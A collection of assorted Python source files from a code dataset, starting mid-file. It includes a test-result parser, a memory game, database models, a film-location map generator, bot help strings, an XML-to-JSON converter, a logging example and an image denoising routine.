str(v[0].contents[0].string)\n # exit status\n s.overall = str(v[2].contents[0].string)\n s.exit = str(v[3].contents[0].string)\n try:\n s.error = str(v[4].contents[0].contents[0].string)\n except:\n s.error = 'None'\n s.exitcode = str(v[10].string)\n # links to log segments:\n s.lextract = s.urlbase + str(v[0].a['href'])\n if v[4].a:\n s.lerror = s.urlbase + str(v[4].a['href'])\n s.ldir = s.urlbase + str(v[-2].a['href'])\n logs = v[-1].findAll('a')\n if s.overall != 'SKIP' and len(logs)==2:\n s.ltail = s.urlbase + str(logs[0]['href'])\n s.llog = s.urlbase + str(logs[1]['href'])\n def __str__(s):\n return '%s\\t %s %s %s'%(s.name,s.overall,s.exit,s.error)\n def is_error_athena(s):\n nafail = (s.error == 'N/A') and (s.exit=='FAIL') and (s.overall=='ERROR')\n timeout = (s.exit=='TIMEOUT')\n return True if (re.match('FAIL',s.error) or nafail or timeout) else False\n def is_error_exit(s):\n if s.is_error_athena(): return False\n return True if re.match('FAIL',s.exit) else False\n def is_error_post(s):\n if s.is_error_athena(): return False\n if s.is_error_exit(): return False\n return True if re.match('ERROR',s.overall) else False\n def samebug(s,t):\n if t.name == s.name and t.overall==s.overall and t.exit==s.exit and t.error==s.error and t.exitcode==s.exitcode:\n return True\n return False\n def fixedbug(s,t):\n \"\"\" s = older nightly; t = current nightly\"\"\"\n if t.name != s.name: return False\n assert s.is_error_exit() or s.is_error_athena(),'This function should only be called from buggy tests'\n if t.is_error_athena(): return False\n if t.is_error_exit(): return False\n if t.is_error_post(): return False # let's keep this as a failure category, too\n return True\n","sub_path":"TriggerValidation/tags/TriggerValidation-12-03-08/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":2672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"652535882","text":"import sys\r\nfrom random import *\r\nfrom turtle import *\r\nfrom freegames import path\r\n\r\ncar = path('car.gif')\r\n\r\n# Loop until the user picks a valid game mode\r\nwhile True:\r\n try:\r\n num_or_colors = int(input(\"Enter a number: 0. Numbers | 1. Accented letters | 2. Quit\\n\"))
\r\n if num_or_colors == 0:\r\n tiles = list(range(32)) * 2\r\n break\r\n elif num_or_colors == 1:\r\n tiles = [\"a\", \"b\", \"c\", \"d\", \"e\", \"f\", \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"ñ\", \"o\", \"p\", \"q\", \"r\",\r\n \"s\", \"t\", \"u\", \"v\", \"w\", \"x\", \"y\", \"z\", \"ó\", \"í\", \"é\", \"á\", \"ú\", \"a\", \"b\", \"c\", \"d\", \"e\", \"f\",\r\n \"g\", \"h\", \"i\", \"j\", \"k\", \"l\", \"m\", \"n\", \"ñ\", \"o\", \"p\", \"q\", \"r\", \"s\", \"t\", \"u\", \"v\", \"w\", \"x\",\r\n \"y\", \"z\", \"ó\", \"í\", \"é\", \"á\", \"ú\"]\r\n break\r\n elif num_or_colors == 2:\r\n sys.exit(0)\r\n\r\n except ValueError: # If the input is not a valid number, ask again\r\n print(\"Please try again\")\r\n\r\nstate = {'mark': None, 'numTap':0}\r\nhide = [True] * 64\r\n\r\ndef square(x, y):\r\n \"Draw white square with black outline at (x, y).\"\r\n up()\r\n goto(x, y)\r\n down()\r\n color('black', 'white')\r\n begin_fill()\r\n for count in range(4):\r\n forward(50)\r\n left(90)\r\n end_fill()\r\n\r\n\r\ndef index(x, y):\r\n \"Convert (x, y) coordinates to tiles index.\"\r\n return int((x + 200) // 50 + ((y + 200) // 50) * 8)\r\n\r\n\r\ndef xy(count):\r\n \"Convert tiles count to (x, y) coordinates.\"\r\n return (count % 8) * 50 - 200, (count // 8) * 50 - 200\r\n\r\n\r\ndef tap(x, y):\r\n \"Update mark and hidden tiles based on tap.\"\r\n # Use the click coordinates to find the index into hide\r\n spot = index(x, y)\r\n # mark starts out as None\r\n mark = state['mark']\r\n # Every tap increments the tap counter\r\n state['numTap'] += 1\r\n\r\n if mark is None or mark == spot or tiles[mark] != tiles[spot]:\r\n # If mark is None, store the tapped index\r\n # If the marked index equals the newly tapped one, keep the same mark\r\n # If the tile value differs from the previous one, remember the new index\r\n state['mark'] = spot\r\n else:\r\n # Different indices but the same tile value: reveal both\r\n hide[spot] = False\r\n hide[mark] = False\r\n state['mark'] = None\r\n\r\n\r\ndef draw():\r\n \"Draw image and tiles.\"\r\n clear()\r\n goto(0, 0)\r\n shape(car)\r\n stamp()\r\n\r\n for count in range(64):\r\n # Draw covers for the tiles that still have hide = True\r\n if hide[count]:\r\n x, y = xy(count)\r\n square(x, y)\r\n\r\n mark = state['mark']\r\n\r\n if mark is not None and hide[mark]:\r\n # If the marked tile is still covered, show its value\r\n x, y = xy(mark)\r\n up()\r\n goto(x + 25.6, y) # This offset was found empirically\r\n color('black')\r\n write(tiles[mark], align='center', font=('Arial', 28, 'normal')) # write() centers the tile value\r\n\r\n # Once no tile is left hidden, the game is over
\r\n if not any(hide):\r\n\r\n print(\"Done, congratulations!!\")\r\n print(\"Your number of taps was:\", state['numTap'])\r\n else:\r\n # Redraw the board\r\n update()\r\n ontimer(draw, 100)\r\n\r\nshuffle(tiles)\r\nsetup(420, 420, 370, 0)\r\naddshape(car)\r\nhideturtle()\r\ntracer(False)\r\nonscreenclick(tap)\r\ndraw()\r\ndone()","sub_path":"JuegoMemoria/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"531884668","text":"import sqlalchemy\nfrom sqlalchemy import create_engine, Column, Integer, String, ForeignKey, Float\nfrom sqlalchemy.ext.declarative import declarative_base \nfrom sqlalchemy.orm import sessionmaker, relationship\nfrom flask.ext.sqlalchemy import SQLAlchemy\n\nBase = declarative_base()\n\n\nclass Twitstock(Base):\n\t__tablename__='Twitstock'\n\tid = Column(Integer, primary_key=True)\n\tscreen_name=Column(String(50))\n\tcreated_at=Column(String(50))\n\ttext = Column(String(500))\n\tretweet_count = Column(Integer)\n\nclass ChinaStockNews(Base):\n\t__tablename__='ChinaStockNews'\n\tid = Column(Integer, primary_key=True)\n\tscreen_name=Column(String(50))\n\tcreated_at=Column(String(50))\n\ttext = Column(String(500))\n\tretweet_count = Column(Integer)\n\n\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"604910906","text":"import json\n\nimport pytest\n\n\ndef pytest_addoption(parser):\n parser.addoption(\n \"--credentials_json\",\n action=\"store\",\n default=None,\n help=\"path to catmaid credentials in JSON form\",\n )\n\n\n@pytest.fixture\ndef credentials(request):\n cred_path = request.config.getoption(\"--credentials_json\")\n\n if not cred_path:\n pytest.skip(\"No CATMAID credentials given\")\n\n with open(cred_path) as f:\n return json.load(f)\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"565292369","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/local/lib/python2.7/dist-packages/kolekto/datasources/mediainfos.py\n# Compiled at: 2014-06-16 16:12:17\nimport os, logging\nfrom kolekto.datasources import Datasource\nfrom kolekto.helpers import JsonDbm\nimport kaa.metadata\nmetadata_logger = logging.getLogger('metadata')\nmetadata_logger.setLevel(logging.CRITICAL)\n\nclass MediainfosDatasource(Datasource):\n\n def __init__(self, *args, **kwargs):\n super(MediainfosDatasource, self).__init__(*args, **kwargs)\n cache_filename = os.path.join(self.tree, '.kolekto', 'media-info-cache.db')\n self._cache = JsonDbm(cache_filename)\n\n def attach(self, movie_hash, movie):\n if movie_hash in self._cache:\n media_infos = self._cache.get(movie_hash)\n else:\n filename = os.path.join(self.tree, '.kolekto', 'movies', movie_hash)\n infos = kaa.metadata.parse(filename)\n if infos is None:\n return movie\n media_infos = {}\n media_infos['container'] = infos['type'].strip()\n if infos.video[0].width < 1280:\n media_infos['quality'] = 'SD'\n elif 1280 <= infos.video[0].width < 1920:\n media_infos['quality'] = '720p'\n else:\n media_infos['quality'] = '1080p'\n media_infos['ext'] = infos['mime'].split('/')[(-1)]\n
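 # note (added): assumes kaa's 'length' is reported in seconds, so runtime is stored as whole minutes\n 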
media_infos['runtime'] = int(infos['length'] / 60)\n self._cache.save(movie_hash, media_infos)\n movie.update(media_infos)\n return movie","sub_path":"pycfiles/kolekto-1.3.linux-x86_64.tar/mediainfos.py","file_name":"mediainfos.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"619764442","text":"\"\"\" https://github.com/stepansushko1/Films_map \"\"\"\n\nimport folium\nimport geopy\nimport math\nfrom geopy.exc import GeocoderUnavailable\nfrom geopy.extra.rate_limiter import RateLimiter\n\n\ndef write_file_to_txt(read_path: str, write_path: str):\n \"\"\" Convert .list file to .txt format \"\"\"\n with open(read_path, \"r\", encoding='iso-8859-1') as file_1:\n\n for _ in range(14):\n next(file_1)\n our_text = file_1.read()\n\n with open(write_path, \"w\", encoding='iso-8859-1') as file_2:\n file_2.write(our_text)\n\n\ndef file_prepocessing(path: str):\n \"\"\" Processing of data. Bringing to next form: [film name, year, location, coords \"\"\"\n with open(path, \"r\", encoding='iso-8859-1') as file:\n lst_of_movies = []\n i = 0\n for line in file:\n line = line.strip()\n line = line.split(\"\\t\")\n line = list(filter(None, line)) # remove ''\n\n if line[-1][0] == \"(\": # for ( after the country\n del line[-1]\n\n line = \" \".join(line)\n if \"{\" in line: # перевірка на лишні { } після року\n line = line.replace(\"{\", '\\t')\n line = line.replace(\"}\", '\\t')\n line = line.split(\"\\t\")\n del line[1]\n line = ' '.join(line)\n\n line = line.split(\" \")\n line = list(filter(None, line))\n\n for i in range(len(line)):\n\n if line[i][0] == \"(\":\n\n year = line[i]\n film_name = \" \".join(line[:i])\n location = \" \".join(line[i+1:])\n\n if location[0] == \"(\":\n location = location[location.find(\")\") + 1:]\n\n line.clear()\n line.append(film_name)\n line.append(year[1:-1]) # year withou ()\n line.append(location)\n\n break\n\n lst_of_movies.append(line)\n\n return lst_of_movies\n\n\ndef find_year(films_lst: list, year: int):\n \"\"\" Filter list of films by given year \"\"\"\n filtered_films_lst = [line for line in films_lst if line[1] == str(year)]\n\n return filtered_films_lst\n\n\ndef add_coords(filtered_lst):\n \"\"\" Find coordinates for list of films \"\"\"\n for line in filtered_lst:\n try:\n location = line[2]\n\n location = location.split(\", \")\n geolocator = geopy.Nominatim(user_agent=\"main.py\")\n geocode = RateLimiter(geolocator.geocode, min_delay_seconds=0.05)\n adres = geolocator.geocode(location)\n\n if adres == None:\n location = location[1:]\n adres = geolocator.geocode(location)\n\n if adres == None:\n location = location[1:]\n adres = geolocator.geocode(location)\n\n coords = (float(adres.latitude), float(adres.longitude))\n\n line.append(coords)\n\n except GeocoderUnavailable:\n\n line.append(\"error\")\n return filtered_lst\n\n\ndef coords_distance(my_coords: tuple, coords: tuple):\n \"\"\" Find distance between two coords \"\"\"\n try:\n haversinus = (math.sin((math.pi / 180) * (my_coords[0] - coords[0])/2)**2 + math.cos((math.pi / 180)*my_coords[0])\n * math.cos((math.pi / 180)*coords[0]) * math.sin((math.pi / 180)*(my_coords[1] - coords[1])/2)**2)\n except TypeError:\n haversinus = 100000\n\n try:\n distance = 6371.3 * 2 * math.asin(math.sqrt(haversinus))\n except ValueError:\n distance = 1000000\n\n return distance\n\n\ndef find_places(filtered_lst: list, my_coords: tuple):\n \"\"\" Find ten or less nearest places\"\"\"\n for i in 
range(len(filtered_lst)):\n filtered_lst[i].insert(0, coords_distance(\n my_coords, filtered_lst[i][3]))\n\n filtered_lst.sort()\n\n if len(filtered_lst) > 10:\n return filtered_lst[:10]\n\n return filtered_lst\n\n\ndef place_on_map(filtered_lst, my_coords):\n \"\"\" Generate a web-page with map and nearest movie places on it \"\"\"\n my_map = folium.Map(tiles='OpenStreetMap', location=[\n my_coords[0], my_coords[1]], zoom_start=5)\n\n fg = folium.FeatureGroup(name='Films map')\n\n lines = folium.FeatureGroup(name=\"Dots lines\")\n\n for i in filtered_lst:\n if i[4][0] != \"e\":\n fg.add_child(folium.Marker(location=[i[4][0], i[4][1]],\n popup=i[1]))\n\n lines.add_child(folium.PolyLine([(i[4][0], i[4][1]), my_coords]))\n\n fg_pp = folium.FeatureGroup(name=\"Colored map\")\n\n fg_pp.add_child(folium.GeoJson(data=open('world.json', 'r',\n encoding='utf-8-sig').read(),\n style_function=lambda x: {'fillColor': 'green'\n if x['properties']['POP2005'] < 10000000\n else 'orange' if 10000000 <= x['properties']['POP2005'] < 20000000\n else 'red'}))\n\n my_map.add_child(lines)\n my_map.add_child(fg)\n my_map.add_child(fg_pp)\n my_map.add_child(folium.LayerControl())\n\n my_map.save(\"map.html\")\n\n\ndef main():\n \"\"\" Main function that runs the module \"\"\"\n year = int(input(\"Please, enter a year: \"))\n latitude = float(input(\"Enter latitude: \"))\n longitude = float(input(\"Enter longitude: \"))\n my_coords = tuple([latitude, longitude])\n\n txt_file = \"local.txt\"\n\n films_with_correct_year = find_year(file_prepocessing(\"local.txt\"), year)\n\n films_with_correct_year_coords = add_coords(films_with_correct_year)\n\n nearest_films = find_places(films_with_correct_year_coords, my_coords)\n\n places = place_on_map(nearest_films, my_coords)\n\n return places\n\n\nif __name__ == \"__main__\":\n main()\n print(\" Check your map on map.html \")\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"161784149","text":"from util.containers import HelpForm as form\n\n\nbackup = form('`{}backup`\\n'\n 'Backup all bots to file.')\n\ndelet = form('`{}delet [server id] [channel id] [message id]`\\n'\n 'Do a delet')\n\ninvite = form('`{}invite`\\n'\n 'Returns bot\\'s invite link.')\n\nprefix = form('`{0}prefix`\\n'\n '`{0}prefix [prefix]`\\n'\n 'Get or set bot prefix.')\n\nregen = form('`{}regen`\\n'\n 'Restart bot script.')\n\nrepl = form('`{}repl [optional:@member]`\\n'\n 'Opens a Python REPL. Available args are `ctx` and `member` if passed.')\n\nsayd = form(\"`{0}sayd [message]`\\n\"\n \"`{0}sayd [args]`\\n\"\n \"Sayd (say-delete) says a message, then \"\n \"deletes your command. Args should be space \"\n \"separated and subargs comma-separated. Use \"\n \"a `:` to denote the start of an arg. 
Arg list:\\n\"\n \"`init - title,desc,url,colour`\\n\"\n \"`footer - text,icon_url`\\n\"\n \"`image - url`\\n\"\n \"`thumbnail - url`\\n\"\n \"`author - name,url,icon_url`\\n\"\n \"`field - name,value,inline`\\n\"\n \"Example:\\n\"\n \"```python\\n\"\n \"{0}sayd embed init:title=SampleEmbed,desc=\\\"a \"\n \"description\\\",color=0xff0000 field:name=\\\"One \"\n \"field\\\",value=things field:name=\\\"Two field\\\",\"\n \"value=\\\"more things\\\",inline=False\\n```\")\n\nsend = form('`{}send [channel id] [text]`\\n'\n 'Send a message to a channel.')\n\nserver = form(\"`{0}server [(bot name)/'this'] [(invite url)/'this'] [\"\n \"quote delay]`\\n\"\n \"Note: 'this' refers to bot/server this command is being executed from\\n\"\n \"Example: `{0}server add this this 3` adds current server to current bot with \"\n \"spam timer of 3 minutes\\n\"\n \"*Note: This command is deprecated, as servers are now added automagically. \"\n \"It remains for manual control in case of errors, but you shouldn't ever have \"\n \"to use it*\")\n\nserverid = form('`{}serverid`\\n'\n 'Get the server\\'s ID.')\n\nsleep = form('`{}sleep`\\n'\n 'Shutdown bot script.')\n\nwrite = form('`{}write`\\n'\n 'Writes all bots to file.')\n","sub_path":"help_args/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":2284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"77468027","text":"\"\"\"\n Description: Converts a given XML file(s) to Json(s) and writes them to the CWD\n :input param file(s) directory: Directory\n :input param json name: Output json name + extension\n\n Author: Miguel Rodriguez Extended functionality\n\n\"\"\"\n\nimport json\nimport os\n\nfrom lxml import etree\n\ndef xml_to_json(xml_input, json_output):\n '''Converts an xml file to json.'''\n dict_to_json(etree_to_dict(xml_to_etree(xml_input), True), json_output)\n\ndef xml_to_etree(xml_input):\n '''Converts xml to a lxml etree.'''\n f = open(xml_input, 'r')\n xml = f.read()\n f.close()\n return etree.HTML(xml)\n\ndef etree_to_dict(tree, only_child):\n '''Converts an lxml etree into a dictionary.'''\n mydict = dict([(item[0], item[1]) for item in tree.items()])\n children = tree.getchildren()\n if children:\n if len(children) > 1:\n mydict['children'] = [etree_to_dict(child, False) for child in children]\n else:\n child = children[0]\n mydict[child.tag] = etree_to_dict(child, True)\n if only_child:\n return mydict\n else:\n return {tree.tag: mydict}\n\ndef dict_to_json(dictionary, json_output):\n '''Converts a dictionary into a json file.'''\n directory = os.getcwd() + '/resultsJson/'\n fullpath = os.path.join(directory, json_output)\n f = open(fullpath, 'w')\n f.write(json.dumps(dictionary, sort_keys=True, indent=4))\n f.close()\n\ndef main():\n directory = os.getcwd() + '/newmultiview/exp_visualization/SciAnalysis/results/'\n\n count = 0\n\n for filename in os.listdir(directory):\n if filename.endswith(\".xml\"):\n print('Converting XML file to Json...')\n\n jsonName = filename + '.json'\n xml_to_json(directory + filename, jsonName)\n else:\n print('File extension is not XML!')\n print(\"\"\"All XML files in the given directory were successfully converted into their Json's counterparts!\"\"\")\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"app/dev/xml2json.py","file_name":"xml2json.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}{"seq_id":"420256967","text":"#!/usr/bin/env python\n# 
-*- coding: utf-8 -*-\n\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf-8')\nimport string\nimport re\nimport io\nimport os\nimport json\n\n\nstationList = \"guangzhou.json\"\n\nTEMPLATE = \"station_template.conf\"\n\ndataConf = \"station.conf\"\n\nsourceFile = \"stationList.txt\"\n\nfinalList = \"finalGZ.json\"\n\ncmd = \"canary --project pr_search -U http://dispatcher.is.autonavi.com/dispatcher -L 3 --file station.conf -> stationList.txt\"\n\ndef generateDataConf(stationList,TEMPLATE,dataConf):\n\t\n # Read source json file\n masterDataFile = open(stationList, \"r\") \n dataEntries = json.load(masterDataFile)\n destinationFile = io.open(dataConf, \"w\", encoding='utf-8')\n\n for dataEntry in dataEntries:\n # print(dataEntry[\"name\"])\n # print(\"\\n\")\n templateFile = open(TEMPLATE, \"r\") \n template = templateFile.read()\n \n # Replace \n template = template.replace(\"\", dataEntry[\"name\"])\n\n destinationFile.write(unicode(template))\n destinationFile.write(unicode(\"\\n\\n\"))\n\n templateFile.close()\n\n destinationFile.close()\n\ndef updateList(stationList,sourceFile,finalList):\n\n fileOut = io.open(finalList,'w')\n\n name = []\n muid = []\n with open(sourceFile, 'r') as f:\n for line in f.readlines():\n line = line.strip()\n if re.match(r'__search_string__ = 虫雷 岗地铁站', line):\n name.append(\"虫雷 岗地铁站\")\n muid.append(\"\")\n elif re.match(r'^__search_string__', line):\n # print(line.split('=')[1].strip())\n name.append(line.split('=')[1].strip())\n elif re.match(r'^muid', line):\n muid.append(line.split(':')[1].strip())\n\n obj = []\n\n for i in range(len(name)):\n item = {}\n item[\"name\"] = name[i].decode(\"utf-8\")\n item[\"muid\"] = muid[i].decode(\"utf-8\")\n obj.append(item)\n\n with open(stationList, 'r') as j:\n final = json.load(j)\n for i in final:\n for j in obj:\n if i[\"name\"] == j[\"name\"]:\n i['muid'] = j['muid']\n\n fileOut.write(json.dumps(final, sort_keys=True, indent=4, separators=(',', ': '), ensure_ascii=False))\n\nif __name__ == \"__main__\":\n\n generateDataConf(stationList,TEMPLATE,dataConf)\n os.system(cmd)\n updateList(stationList,sourceFile,finalList)","sub_path":"maps_eval/scrap_caboose/guangzhou/muid.py","file_name":"muid.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"584242364","text":"import numpy as np\n\nfrom autumn.tools.project import Project, ParameterSet, TimeSeriesSet, build_rel_path, get_all_available_scenario_paths, use_tuned_proposal_sds\nfrom autumn.tools.calibration import Calibration\nfrom autumn.tools.project.params import read_yaml_file\nfrom autumn.tools.calibration.priors import UniformPrior, TruncNormalPrior\nfrom autumn.tools.calibration.targets import NormalTarget, PoissonTarget, TruncNormalTarget\nfrom autumn.models.covid_19 import base_params, build_model\nfrom autumn.settings import Region, Models\nimport os\n\n\nCLUSTERS = [Region.to_filename(r) for r in Region.VICTORIA_SUBREGIONS]\n\n# Just calibrate to June, July, August and September for now (but run for some lead in time at the start)\nTARGETS_START_TIME = 153 # 1st June\nTARGETS_END_TIME = 305 # 31st October\nTARGETS_RANGE = (TARGETS_START_TIME, TARGETS_END_TIME)\n\n# Load and configure model parameters\ndefault_path = build_rel_path(\"params/default.yml\")\nmle_path = build_rel_path(\"params/mle-params.yml\")\nscenario_dir_path = build_rel_path(\"params/\")\nscenario_paths = get_all_available_scenario_paths(scenario_dir_path)\nbaseline_params = 
base_params.update(default_path).update(mle_path, calibration_format=True)\nscenario_params = [baseline_params.update(p) for p in scenario_paths]\nparam_set = ParameterSet(baseline=baseline_params, scenarios=scenario_params)\n\n# Add calibration targets and priors\nts_set = TimeSeriesSet.from_file(build_rel_path(\"targets.secret.json\"))\n\n# For all the cluster targets, a universal calibrated parameter called \"target_output_ratio\" is used to scale the\n# dispersion parameter of the targets' normal likelihoods.\ncluster_targets = []\nfor cluster in CLUSTERS:\n notifs_ts = ts_set.get(f\"notifications_for_cluster_{cluster}\").moving_average(4)\n target = NormalTarget(notifs_ts)\n cluster_targets.append(target)\n\n# Request calibration targets\ntargets = [\n PoissonTarget(ts_set.get(\"notifications\").truncate_times(*TARGETS_RANGE).round_values()),\n PoissonTarget(ts_set.get(\"infection_deaths\").truncate_times(*TARGETS_RANGE).moving_average(7)),\n PoissonTarget(ts_set.get(\"hospital_admissions\").truncate_times(*TARGETS_RANGE)),\n PoissonTarget(ts_set.get(\"icu_admissions\").truncate_times(*TARGETS_RANGE)),\n *cluster_targets,\n]\n\n# Add multiplier for most services, except use South Metro for South East Metro, use North Metro for West Metro\ncluster_priors = []\nregions_for_multipliers = [\n reg for reg in Region.VICTORIA_METRO if reg not in (Region.SOUTH_EAST_METRO, Region.WEST_METRO)\n]\nregions_for_multipliers.append(Region.BARWON_SOUTH_WEST)\n\nfor region in regions_for_multipliers:\n region_name = region.replace(\"-\", \"_\")\n name = f\"victorian_clusters.contact_rate_multiplier_{region_name}\"\n # Shouldn't be too peaked with these values.\n prior = TruncNormalPrior(name, mean=1.0, stdev=0.5, trunc_range=[0.5, np.inf], jumping_stdev=0.15)\n cluster_priors.append(prior)\n\npriors = [\n # Global COVID priors, but with jumping sds adjusted\n TruncNormalPrior(\n \"sojourn.compartment_periods_calculated.exposed.total_period\",\n mean=5.5,\n stdev=0.97,\n trunc_range=[1.0, np.inf],\n jumping_stdev=0.5,\n ),\n TruncNormalPrior(\n \"sojourn.compartment_periods_calculated.active.total_period\",\n mean=6.5,\n stdev=0.77,\n trunc_range=[4.0, np.inf],\n jumping_stdev=0.4,\n ),\n # Cluster specific priors.\n *cluster_priors,\n # Victorian regional priors.\n TruncNormalPrior(\n f\"victorian_clusters.contact_rate_multiplier_regional\",\n mean=1.0,\n stdev=0.5,\n trunc_range=[0.5, np.inf],\n jumping_stdev=0.15,\n ),\n UniformPrior(\"contact_rate\", [0.04, 0.07], jumping_stdev=0.008),\n UniformPrior(\"victorian_clusters.intercluster_mixing\", [0.005, 0.05], jumping_stdev=0.01),\n UniformPrior(\"infectious_seed\", [20., 70.], jumping_stdev=4.),\n UniformPrior(\"clinical_stratification.non_sympt_infect_multiplier\", [0.2, 0.8], jumping_stdev=0.05),\n UniformPrior(\"infection_fatality.top_bracket_overwrite\", [0.05, 0.3], jumping_stdev=0.04),\n UniformPrior(\"clinical_stratification.props.hospital.multiplier\", [0.5, 5.0], jumping_stdev=0.4),\n UniformPrior(\"testing_to_detection.assumed_cdr_parameter\", [0.2, 0.5], jumping_stdev=0.04),\n TruncNormalPrior(\n \"sojourn.compartment_periods.icu_early\",\n mean=12.7,\n stdev=4.0,\n trunc_range=[5.0, np.inf],\n jumping_stdev=4.\n ),\n UniformPrior(\n \"victorian_clusters.metro.mobility.microdistancing.behaviour_adjuster.parameters.effect\",\n [0.0, 0.6],\n jumping_stdev=0.075,\n ),\n UniformPrior(\n \"victorian_clusters.metro.mobility.microdistancing.face_coverings_adjuster.parameters.effect\",\n [0.0, 0.6],\n jumping_stdev=0.04,\n ),\n 
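# (added note) \"target_output_ratio\" scales the dispersion parameter of the per-cluster targets' normal likelihoods (see the comment above)\n 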
UniformPrior(\"target_output_ratio\", [0.2, 0.7], jumping_stdev=0.04),\n UniformPrior(\"contact_tracing.assumed_trace_prop\", [0.2, 0.5], jumping_stdev=0.04),\n]\n\n# Load proposal sds from yml file\nuse_tuned_proposal_sds(priors, build_rel_path(\"proposal_sds.yml\"))\n\ncalibration = Calibration(\n priors,\n targets,\n metropolis_init=\"current_params\",\n metropolis_init_rel_step_size=0.05,\n fixed_proposal_steps=500,\n jumping_stdev_adjustment=0.8,\n)\n\n# FIXME: Replace with flexible Python plot request API.\nimport json\n\nplot_spec_filepath = build_rel_path(\"targets.secret.json\")\nwith open(plot_spec_filepath) as f:\n plot_spec = json.load(f)\n\nproject = Project(\n Region.VICTORIA, Models.COVID_19, build_model, param_set, calibration, plots=plot_spec\n)\n\n# Write parameter table to tex file\nmain_table_params_list = [\n \"clinical_stratification.icu_prop\",\n \"sojourn.compartment_periods_calculated.exposed.total_period\",\n \"contact_rate\"\n]\n# project.write_params_to_tex(main_table_params_list, project_path=build_rel_path(''))\n\n\n# from autumn.tools.calibration.proposal_tuning import perform_all_params_proposal_tuning\n# perform_all_params_proposal_tuning(project, calibration, priors, n_points=100, relative_likelihood_reduction=0.2)\n","sub_path":"autumn/projects/covid_19/victoria/project.py","file_name":"project.py","file_ext":"py","file_size_in_byte":6084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"331242228","text":"def field_to_str(field, filename=None):\n \"\"\"\n list(list(str)), str -> None\n\n Prints field on the desktop or save in the file.\n \"\"\"\n chars = \"ABCDEFGHIJ\"\n field_str = \"+---\" * 11 + \"+\\n| |\"\n for i in range(len(chars)):\n field_str += \" \" + chars[i] + \" |\"\n field_str += \"\\n\" + \"+---\" * 11 + \"+\\n\"\n for line in range(len(field)):\n if line == 9:\n field_str += \"| \" + str(line + 1)\n else:\n field_str += \"| \" + str(line + 1) + \" \"\n for column in range(len(field[line])):\n field_str += \"| \" + field[line][column] + \" \"\n field_str += \"|\\n\" + \"+---\" * 11 + \"+\\n\"\n print(field_str)\n\n if filename:\n with open(filename, \"w\") as field_txt:\n for line in range(len(field)):\n for column in range(len(field[line])):\n field_txt.write(field[line][column])\n if line != 9:\n field_txt.write(\"\\n\")\n","sub_path":"lab1/field_to_str.py","file_name":"field_to_str.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"117965939","text":"#This approach makes use of the Python logging without any Fluentd provided logging \n# functionality. 
As a result we have fallen back to sending HTTP and using a custom\n# formatter to populate the values we would see through the configuration\nimport logging, logging.handlers\nimport datetime\ntestHandler = logging.handlers.HTTPHandler('localhost:18080', '/test', method='POST')\ncustom_format = {\n 'host': '%(hostname)s',\n 'where': '%(module)s.%(funcName)s',\n 'type': '%(levelname)s',\n 'stack_trace': '%(exc_text)s'\n}\nmyFormatter = logging.Formatter(custom_format)\ntestHandler.setFormatter(myFormatter)\n\nlog = logging.getLogger(\"test\")\nlog.addHandler(testHandler)\nnow = datetime.datetime.now().strftime(\"%d-%m-%Y %H-%M-%S\")\nlog.warning('{\"from\":\"log-simple\", \"at\":\"'+now+'\"}')","sub_path":"Chapter11/clients/log-simple.py","file_name":"log-simple.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
{"seq_id":"21337091","text":"# -*- coding:utf-8 -*-\r\n\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef deNoise(filename):\r\n\timage = cv2.imread(filename)\r\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\n\tmedian = cv2.medianBlur(gray, 3)\r\n\r\n\t# cv2.imshow('median',median)\r\n\t# cv2.waitKey()\r\n\t# Initiate the list \r\n\tbar = []\r\n\tfor i in range(256):\r\n\t\tbar.append(0)\r\n\r\n\t# Calculate the frequency of the gray value\r\n\trow, col = median.shape\r\n\tfor i in range(row):\r\n\t\tfor j in range(col):\r\n\t\t\tbar[median[i][j]] += 1\r\n\t\r\n\tmost = max(bar)\r\n\tlocation = bar.index(most)\r\n\tret2, thresh = cv2.threshold(median,location - 40,255,cv2.THRESH_BINARY)\r\n\r\n\tkernel = np.ones((2,2),np.uint8)\r\n\tdilation = cv2.dilate(thresh,kernel,iterations = 1)\r\n\treturn dilation","sub_path":"pre.py","file_name":"pre.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"}
